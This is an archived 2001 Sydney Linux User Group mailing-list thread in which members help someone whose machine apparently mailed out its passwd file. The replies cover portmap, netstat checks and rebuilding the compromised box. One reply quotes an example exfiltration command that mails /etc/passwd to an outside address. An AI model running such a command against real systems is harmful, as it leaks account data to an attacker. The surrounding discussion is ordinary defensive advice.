SLUG Mailing List Archives
RE: [SLUG] Security Breach
- To: <slug@xxxxxxxxxxx>
- Subject: RE: [SLUG] Security Breach
- From: Bernhard Lüder <bl@xxxxxxxxxxx>
- Date: Wed Feb 28 12:30:02 2001
In this context. What is port 587 and 1024. I couldn't find these in
tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:1024 0.0.0.0:* LISTEN
This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged. If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.
From: slug-admin@xxxxxxxxxxx [mailto:slug-admin@xxxxxxxxxxx]On Behalf Of
Sent: Wednesday, February 28, 2001 11:37 AM
To: Sean Carmody
Subject: Re: [SLUG] Security Breach
> Feb 28 01:53:07 emu portmap: connect from 126.96.36.199 to
> getport(status): request from unauthorized host
Why are you rnning the portmapper? Turn it off if youdon't specifically
a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)
If you don't recognize it as something you specifically need - turn it
Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
As above - if you don't need portmap, turn it off.
> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?
Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer oveflow with something like
"/bin/mailx < /etc/passwd bob@xxxxxxxxxxx" etc.. (or somehting like
It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).
If you can, pull the box out of prod and put in a new box while you
examine the compromised one.
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug